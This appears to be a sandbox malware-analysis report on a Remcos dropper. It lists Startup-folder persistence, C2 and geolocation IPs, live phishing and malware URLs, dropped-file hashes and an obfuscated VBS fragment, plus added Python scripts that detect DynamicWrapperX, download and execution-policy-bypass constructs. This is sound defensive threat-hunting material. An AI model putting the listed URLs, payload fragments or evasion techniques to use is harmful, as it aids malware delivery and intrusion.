    17:04:15; API Interceptor; 4x Sleep call for process powershell.exe modified
    17:04:18; Autostart; Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
    17:04:58; API Interceptor; 840972x Sleep call for process winhlp32.exe modified
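The Autostart entry in the timeline is the persistence to hunt for on other hosts: a script interpreter payload sitting in a Startup folder. The following is an added example, not part of the report: it enumerates the per-user and all-users Startup folders, hashes every script it finds, decodes UTF-16 scripts correctly (the dropped remc1.vbs is "Unicode", so a byte-level grep for ASCII strings sees nothing), and scores the content against constructs typical of these obfuscated WSH droppers. The indicator weights and the demo files built by build_demo_startup_dir are assumptions made for the example, not values from the report.

```python
"""Hunt for script-based Startup-folder persistence like the remc1.vbs entry in
the timeline. Added example; scoring weights and demo files are constructed."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd"}
# (pattern, weight, label): weights are an assumption for the example.
INDICATORS = [
    (re.compile(r"DynamicWrapperX|dynwrapx", re.I), 5, "DynamicWrapperX (VBS-to-native-API bridge)"),
    (re.compile(r"\bExecute(?:Global)?\s*\(", re.I), 3, "Execute/ExecuteGlobal of built strings"),
    (re.compile(r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest", re.I), 3, "download capability"),
    (re.compile(r"powershell[^\n]{0,200}bypass", re.I), 3, "execution-policy bypass"),
]


def default_startup_dirs():
    """Per-user and all-users Startup folders, resolved from the environment."""
    dirs = []
    if os.environ.get("APPDATA"):
        dirs.append(Path(os.environ["APPDATA"]) / "Microsoft/Windows/Start Menu/Programs/Startup")
    if os.environ.get("PROGRAMDATA"):
        dirs.append(Path(os.environ["PROGRAMDATA"]) / "Microsoft/Windows/Start Menu/Programs/StartUp")
    return dirs


def decode_script(raw):
    """WSH runs UTF-16 scripts as happily as ASCII ones, so decode by BOM first."""
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw[3:].decode("utf-8", errors="replace")
    return raw.decode("utf-8", errors="replace")


def score_script(text):
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        n = len(pattern.findall(text))
        if n:
            score += weight * min(n, 3)  # cap so one repeated construct cannot dominate
            reasons.append(f"{label} x{n}")
    # Long runs of Chr()/ChrW() concatenation are the obfuscation the sandbox flags.
    chr_calls = len(re.findall(r"\bChrW?\s*\(", text, re.I))
    if chr_calls >= 20:
        score += 4
        reasons.append(f"Chr() obfuscation x{chr_calls}")
    return score, reasons


def scan_startup_dirs(dirs, threshold=5):
    """Every script in a Startup folder is listed; 'suspicious' marks those above threshold."""
    findings = []
    for d in dirs:
        d = Path(d)
        if not d.is_dir():
            continue
        for p in sorted(d.iterdir()):
            if not p.is_file() or p.suffix.lower() not in SCRIPT_EXTS:
                continue
            raw = p.read_bytes()
            score, reasons = score_script(decode_script(raw))
            findings.append({"path": str(p), "size": len(raw),
                             "sha256": hashlib.sha256(raw).hexdigest(),
                             "score": score, "reasons": reasons,
                             "suspicious": score >= threshold})
    return findings


def build_demo_startup_dir():
    """Constructed stand-in for a Startup folder: a UTF-16 dropper, a benign script, a shortcut."""
    d = Path(tempfile.mkdtemp(prefix="startup_demo_"))
    dropper = 'Set dx = CreateObject("DynamicWrapperX")\r\nExecute(s)\r\n'
    (d / "remc1.vbs").write_bytes(b"\xff\xfe" + dropper.encode("utf-16-le"))
    (d / "hello.vbs").write_bytes(b'MsgBox "hi"\r\n')
    (d / "Notes.lnk").write_bytes(b"L\x00\x00\x00")
    return d


if __name__ == "__main__":
    dirs = [d for d in default_startup_dirs() if d.is_dir()] or [build_demo_startup_dir()]
    for f in scan_startup_dirs(dirs):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f'{flag:10} {f["path"]} sha256={f["sha256"]} score={f["score"]} {f["reasons"]}')
```

On a real host the script walks the actual Startup folders; where none exist (a Linux analysis box) it falls back to the constructed demo directory. Low-scoring scripts are still listed, because a script in a Startup folder deserves a look regardless of what the heuristics think of its contents.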
Context: other submissions that contacted IP 178.237.33.50 (sample; detection; threat name; context)
    UrgenteNotificationRef.cmd; malicious; Remcos; geoplugin.net/json.gp
    107. PN-EN-1090-2+A1_2012P.exe; malicious; GuLoader, Remcos; geoplugin.net/json.gp
    URGENTE_NOTIFICATION.cmd; malicious; Remcos, DBatLoader; geoplugin.net/json.gp
    OKhCyJ619J.rtf; malicious; Remcos, DBatLoader; geoplugin.net/json.gp
    fu56fbrtn8.exe; malicious; Remcos, DBatLoader; geoplugin.net/json.gp
    1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe; malicious; Remcos; geoplugin.net/json.gp
    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe; malicious; GuLoader, Remcos; geoplugin.net/json.gp
    TcnD64eVFK.exe; malicious; Remcos; geoplugin.net/json.gp
    DHL Express Courier Pickup Confirmation CBJ231025122456.exe; malicious; Remcos; geoplugin.net/json.gp
    Quotation.xls; malicious; Remcos; geoplugin.net/json.gp

Context: other submissions that resolved domain bg.microsoft.map.fastly.net (sample; detection; threat name; resolved IP)
    https://ken.fnh.temporary.site/wp-includes/sitemaps/update; malicious; Unknown; 199.232.210.172
    https://8fq7c.eceydri.com/WK9D/; malicious; HTMLPhisher; 199.232.210.172
    http://womenofgoodworks-my.sharepoint.com/:b:/g/personal/tia_womenofgoodworks_org/EVICmRtg-CVNtsngkb8KQlgBH2LYVfumjH5s-SFbeQjN_Q; malicious; HTMLPhisher; 199.232.214.172
    https://cloudacc.page.link/RtQw; malicious; HTMLPhisher; 199.232.210.172
    http://www.agilgas.com.br/wp-content/uploads/2024/04/tryythgghjhgfj.html#T0RQQ2pCOVhPSTJvNm12WEYvSGFNOUI2Q3J4bElveUFOazNibHR2QWI4SGp2aG4yU2kwVytiSzF6WjZnZXN5YUFpUTM5dmpINHlOM2JXdGVtdUM3c2UyMk1yVXROeVVDVVMzYUdOeHFWdDg9; malicious; Phisher; 199.232.214.172
    https://colmec.it/category/news; malicious; Unknown; 199.232.214.172
    http://gnoticiasimparciais.com; malicious; Unknown; 199.232.210.172
    https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-website; malicious; Unknown; 199.232.214.172
    http://p.ksrndkehqnwntyxlhgto.com; malicious; Unknown; 199.232.210.172
    https://colmec.it/category/news; malicious; Unknown; 199.232.214.172

Context: other submissions that resolved domain geoplugin.net (sample; detection; threat name; resolved IP)
    UrgenteNotificationRef.cmd; malicious; Remcos; 178.237.33.50
    107. PN-EN-1090-2+A1_2012P.exe; malicious; GuLoader, Remcos; 178.237.33.50
    URGENTE_NOTIFICATION.cmd; malicious; Remcos, DBatLoader; 178.237.33.50
    OKhCyJ619J.rtf; malicious; Remcos, DBatLoader; 178.237.33.50
    fu56fbrtn8.exe; malicious; Remcos, DBatLoader; 178.237.33.50
    1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe; malicious; Remcos; 178.237.33.50
    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe; malicious; GuLoader, Remcos; 178.237.33.50
    HFiHWvPsvA.rtf; malicious; Remcos, DBatLoader; 178.237.33.50
    TcnD64eVFK.exe; malicious; Remcos; 178.237.33.50
    DHL Express Courier Pickup Confirmation CBJ231025122456.exe; malicious; Remcos; 178.237.33.50

Context: other submissions that contacted ASN OVHFR (sample; detection; threat name; IP)
    https://campaign-statistics.com/link_click/PJygYHTMZ2_OXDfP/30633247af9f78d20f1e067eab9a8276; malicious; HTMLPhisher; 91.134.146.191
    https://i.imgur.com/VlAllek.png; malicious; Unknown; 51.79.152.81
    BM-FM_NR.24040718PDF.exe; malicious; FormBook, GuLoader; 51.77.215.151
    ProSheets.msi; malicious; Unknown; 217.182.69.200
    bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exe; malicious; Unknown; 54.38.11.197
    bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exe; malicious; Unknown; 54.38.11.197
    v2cDqXmZtv.elf; malicious; Mirai; 51.79.217.59
    Wd2T9v9ZMT.elf; malicious; Mirai; 51.79.217.59
    7T1vOaCJto.elf; malicious; Mirai; 51.79.217.59
    Price request N#U00b0DEM23000199.js; malicious; AsyncRAT, PureLog Stealer, RedLine; 51.254.27.105

Context: other submissions that contacted ASN ATOM86-ASATOM86NL (sample; detection; threat name; IP)
    UrgenteNotificationRef.cmd; malicious; Remcos; 178.237.33.50
    107. PN-EN-1090-2+A1_2012P.exe; malicious; GuLoader, Remcos; 178.237.33.50
    URGENTE_NOTIFICATION.cmd; malicious; Remcos, DBatLoader; 178.237.33.50
    OKhCyJ619J.rtf; malicious; Remcos, DBatLoader; 178.237.33.50
    fu56fbrtn8.exe; malicious; Remcos, DBatLoader; 178.237.33.50
    1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe; malicious; Remcos; 178.237.33.50
    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe; malicious; GuLoader, Remcos; 178.237.33.50
    TcnD64eVFK.exe; malicious; Remcos; 178.237.33.50
    DHL Express Courier Pickup Confirmation CBJ231025122456.exe; malicious; Remcos; 178.237.33.50
    Quotation.xls; malicious; Remcos; 178.237.33.50
Context: JA3 fingerprints: no context

Context: other submissions that dropped C:\Users\user\AppData\Local\Temp\dynwrapx.dll (sample; detection; threat name)
    46727395.js; malicious; Unknown
    16459.lnk; malicious; Unknown
    2992a904c27bef67021222fbd4ae003f6fb73a9786f62185cee7de32.vbs; malicious; DarkMe
    e97d83285b04e23856ae52ef9b7c0563c7125b0a10465642583f6f03.vbs; malicious; Njrat
    c19a883a77b885b04554f980fc0f3df6eea9adc3ea2a84db4ef8d6b7.vbs; malicious; Unknown
    2425252246__booking_reservation_.vbs; malicious; Remcos
    PDF_Curriculum_Vitae.vbs; malicious; Remcos
    Curriculum_Vitae_Yaquelin_Diaz_pdf_.vbs; malicious; Unknown
    PDF_CONSULTAR_PAGO_[9644112]..vbs; malicious; Remcos
    PDF_CV_Mia_Fisher.vbs; malicious; AsyncRAT, DcRat
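The context tables for 178.237.33.50 / geoplugin.net and for the dropped dynwrapx.dll make the same point from two directions: an indicator that every Remcos sample shares is family telemetry, and one that DarkMe, Njrat, Remcos and AsyncRAT droppers all share is tooling, while the 4444 address has no other submission at all. The following is an added example, not Joe Sandbox tooling, that turns that reading into a repeatable classification. CONTEXT is transcribed from the tables above (sample name and threat names as the report lists them); the empty entry for 139.99.133.66:4444 records that no other submission is listed for it, and the class labels and handling advice are the example's own.

```python
"""Classify how specific each indicator from this report is, using the report's
own context tables. Added example; CONTEXT is transcribed from the tables above,
the class labels and advice strings are the example's assumptions."""
from collections import Counter

CONTEXT = {
    "178.237.33.50 (geoplugin.net)": [
        ("UrgenteNotificationRef.cmd", "Remcos"),
        ("107. PN-EN-1090-2+A1_2012P.exe", "GuLoader, Remcos"),
        ("URGENTE_NOTIFICATION.cmd", "Remcos, DBatLoader"),
        ("OKhCyJ619J.rtf", "Remcos, DBatLoader"),
        ("fu56fbrtn8.exe", "Remcos, DBatLoader"),
        ("1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe", "Remcos"),
        ("#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", "GuLoader, Remcos"),
        ("TcnD64eVFK.exe", "Remcos"),
        ("DHL Express Courier Pickup Confirmation CBJ231025122456.exe", "Remcos"),
        ("Quotation.xls", "Remcos"),
    ],
    # SHA-256 4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379 in the dropped-file list.
    "dynwrapx.dll": [
        ("46727395.js", "Unknown"),
        ("16459.lnk", "Unknown"),
        ("2992a904c27bef67021222fbd4ae003f6fb73a9786f62185cee7de32.vbs", "DarkMe"),
        ("e97d83285b04e23856ae52ef9b7c0563c7125b0a10465642583f6f03.vbs", "Njrat"),
        ("c19a883a77b885b04554f980fc0f3df6eea9adc3ea2a84db4ef8d6b7.vbs", "Unknown"),
        ("2425252246__booking_reservation_.vbs", "Remcos"),
        ("PDF_Curriculum_Vitae.vbs", "Remcos"),
        ("Curriculum_Vitae_Yaquelin_Diaz_pdf_.vbs", "Unknown"),
        ("PDF_CONSULTAR_PAGO_[9644112]..vbs", "Remcos"),
        ("PDF_CV_Mia_Fisher.vbs", "AsyncRAT, DcRat"),
    ],
    "139.99.133.66:4444": [],   # no other submission in the report's context tables
}

ADVICE = {
    "unique": "block and alert; watch for reuse in later submissions to confirm it as actor infrastructure",
    "family-level": "good for attribution and hunting; check whether it is actor infrastructure "
                    "or a public service the family relies on before blocking",
    "shared-tooling": "cross-family indicator; use as hunt context only, not as a blocking or attribution key",
}


def families(threat_field):
    """Split 'GuLoader, Remcos' into a set; 'Unknown' is unattributed, not a family."""
    return {t.strip() for t in threat_field.split(",") if t.strip() and t.strip() != "Unknown"}


def classify(links):
    """unique: nothing else shares it; family-level: one family is present in every
    linked sample; shared-tooling: no single family accounts for all of them."""
    if not links:
        return "unique"
    common = set.intersection(*(families(threat) for _, threat in links))
    return "family-level" if common else "shared-tooling"


def analyse(context):
    report = {}
    for indicator, links in context.items():
        counter = Counter(f for _, threat in links for f in families(threat))
        cls = classify(links)
        report[indicator] = {"other_samples": len(links), "families": dict(counter),
                             "class": cls, "advice": ADVICE[cls]}
    return report


if __name__ == "__main__":
    for indicator, r in analyse(CONTEXT).items():
        print(f'{indicator}: {r["class"]} ({r["other_samples"]} other samples; families {r["families"]})')
        print("    ->", r["advice"])
```

The intersection test is deliberately strict: a single unattributed ("Unknown") sample sharing an indicator is enough to demote it, because an indicator seen in samples nobody could tie to a family is by definition not family-specific.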
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Note: this CAB, the CryptnetUrlCache metadata entry after it (which names the ctldl.windowsupdate.com authrootstl.cab download) and the CLR usage log after that are standard Windows and .NET housekeeping written when RegAsm.exe validates a certificate chain and loads framework assemblies; the two PowerShell AppLocker test files further down are the same kind of artefact. Of the files detailed in this list, only dynwrapx.dll (written by wscript.exe) and the geoplugin.net JSON response (written by winhlp32.exe) are attributable to the sample's own behaviour.
Category:dropped
                                  Size (bytes):69993
                                  Entropy (8bit):7.99584879649948
                                  Encrypted:true
                                  SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                  MD5:29F65BA8E88C063813CC50A4EA544E93
                                  SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                  SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                  SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                  Malicious:false
                                  Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.1354334016381724
                                  Encrypted:false
                                  SSDEEP:6:kKKzqlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:QqlMkPlE99SNxAhUeVLVt
                                  MD5:78962DA4ACFB601EE169040831DA0FC9
                                  SHA1:FE94CB3CCC97CEFB6ECF209083EFE2C05206AD94
                                  SHA-256:1385A4D70153E6B5A6054BAD5F7CD0DE25CBB003DADDB3F71480BEB118AB0437
                                  SHA-512:51D059A723C3A2B6D3F03A0C37609CDACE4C7AF016AF0AD456FF679D926FF232D39E4424227E8FE55014EDF2D39A296D70DFAE090DD92C515981CDAFD6EC52A5
                                  Malicious:false
                                  Preview:p...... .........6f.X...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:CSV text
                                  Category:dropped
                                  Size (bytes):425
                                  Entropy (8bit):5.353683843266035
                                  Encrypted:false
                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                  MD5:859802284B12C59DDBB85B0AC64C08F0
                                  SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                  SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                  SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                  Process:C:\Windows\winhlp32.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):965
                                  Entropy (8bit):5.0061630437862155
                                  Encrypted:false
                                  SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
                                  MD5:664DA71A99A7A7C426134240B73EF767
                                  SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
                                  SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
                                  SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
                                  Malicious:false
                                  Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.383195573997631
                                  Encrypted:false
                                  SSDEEP:24:3pytZWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8e9rq:ZyjWSU4y4RQmFoUeUmfmZ9tlNWR82m
                                  MD5:BCAC66526576FEC3D50B40E872EA098F
                                  SHA1:6982643A88C2C79B00A807737E52D621728361A0
                                  SHA-256:269948B6F8E059FE396D26C5972DDB2DFD2A2678D6B179635118613172BF6F52
                                  SHA-512:196BAE8B49AE92DC5409075AE0EFF7F77C7A5631DA965C72D92B2CCF0CD54266C45EB23AA1908BAE82880CE54347E7081C41845F64AD6922317500003F949BC8
                                  Malicious:false
                                  Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\wscript.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Note: dynwrapx.dll is the DynamicWrapperX COM component (built with GoAsm/GoLink, as the PE preview below shows). Once registered, which is what the regsvr32.exe children of wscript.exe in the behavior graph are consistent with, it lets VBScript call arbitrary Win32 APIs, and that is how a script host process comes to carry "Allocates memory in foreign processes" and "Injects a PE file into a foreign process" signatures. The context list below shows the same DLL dropped by unrelated families, so its hash identifies the tooling, not this campaign.
Category:dropped
                                  Size (bytes):13312
                                  Entropy (8bit):5.361023027635644
                                  Encrypted:false
                                  SSDEEP:192:zw6pqzIbezCj4Wz6KxpEibQiadLAGEZr8k4e2bC74gVvaAUW:z9lbbkWzXEibQifOk4e2bC74YvaW
                                  MD5:E0B8DFD17B8E7DE760B273D18E58B142
                                  SHA1:801509FB6783C9E57EDC67A72DDE3C62080FFBAF
                                  SHA-256:4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379
                                  SHA-512:443359DA27B3C87E81AE4F4B9A2AB7E7BF6ABFA93551FC62347A0B79B36D79635131ABC14D4DEDDAB3ACE12FDF973496518F67E1BE8DC4903B35FD465835556B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 46%
                                   Joe Sandbox View:
                                   • Filename: 46727395.js, Detection: malicious
                                   • Filename: 16459.lnk, Detection: malicious
                                   • Filename: 2992a904c27bef67021222fbd4ae003f6fb73a9786f62185cee7de32.vbs, Detection: malicious
                                   • Filename: e97d83285b04e23856ae52ef9b7c0563c7125b0a10465642583f6f03.vbs, Detection: malicious
                                   • Filename: c19a883a77b885b04554f980fc0f3df6eea9adc3ea2a84db4ef8d6b7.vbs, Detection: malicious
                                   • Filename: 2425252246__booking_reservation_.vbs, Detection: malicious
                                   • Filename: PDF_Curriculum_Vitae.vbs, Detection: malicious
                                   • Filename: Curriculum_Vitae_Yaquelin_Diaz_pdf_.vbs, Detection: malicious
                                   • Filename: PDF_CONSULTAR_PAGO_[9644112]..vbs, Detection: malicious
                                   • Filename: PDF_CV_Mia_Fisher.vbs, Detection: malicious
                                  Preview:MZl.....................@.......Win32 Program!..$......!.L.!`...GoLink, GoAsm www.GoDevTool.com.PE..L...5u.H...........!...&.....................0.......................................................................p.......`..d....P...............................................................................`..h...........................code....p........................... ..`data....P....0......................@...const........@......................@..@.rsrc........P.......&..............@..@.idata..b....`.......*.............. ..`.edata.......p......................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (30665), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1153053
                                  Entropy (8bit):4.2877223818176775
                                  Encrypted:false
                                  SSDEEP:12288:NSTVA+kRl0fK01sQI/2Y9F+Rd+eonsb5dejOUBMgeGbAXONwmw5qgGyI62OTJeeS:MT2++udrIs+F
                                  MD5:9317AB6C1740DC1F1384918831F8D0DC
                                  SHA1:07466682ED2D7EAD1A1570CE604E388F9CBB5E5C
                                  SHA-256:53A52E986540D9A13F7E1166D61DE49880E3B7B9AC5A32AB5B80D5F92D515B23
                                  SHA-512:FD047BB307AE29B924C8139A03C44BF23277D95847EF15BC97B9096B51EA3F1921DED9427AE86D71B19D249E3DB152FF7CABCE2B95AAB038E3AEE548531C9CD7
                                  Malicious:true
                                  Preview:'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_ParamsActIDOptional = "[Activation ID | All]"'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_optListTkaCertsUsage = "List Token-based Activation Certificates"....' L_optForceTkaActivation = "fta"..' L_optForceTkaActivationUsage = "Force Token-based 444Activatio44n"......' L_optADActivate = "ad-activation-o33nline"..' L_optADActivateUsage = "Activate AD (Active Directory) forest with user-provided product key"....' L_optADGetIID = "ad-activatio444n-get-iid"..' L_optADGetIIDUsage = "Display Installation ID for AD (Active Directory) forest"....' L_optADApplyCID = "ad-activation-apply-cid"..' L_optADApplyCIDUsage = "Acti44444444444444444vate AD (Active Directory) forest wi
                                  Process:C:\Windows\SysWOW64\wscript.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (30665), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1153053
                                  Entropy (8bit):4.2877223818176775
                                  Encrypted:false
                                  SSDEEP:12288:NSTVA+kRl0fK01sQI/2Y9F+Rd+eonsb5dejOUBMgeGbAXONwmw5qgGyI62OTJeeS:MT2++udrIs+F
                                  MD5:9317AB6C1740DC1F1384918831F8D0DC
                                  SHA1:07466682ED2D7EAD1A1570CE604E388F9CBB5E5C
                                  SHA-256:53A52E986540D9A13F7E1166D61DE49880E3B7B9AC5A32AB5B80D5F92D515B23
                                  SHA-512:FD047BB307AE29B924C8139A03C44BF23277D95847EF15BC97B9096B51EA3F1921DED9427AE86D71B19D249E3DB152FF7CABCE2B95AAB038E3AEE548531C9CD7
                                  Malicious:true
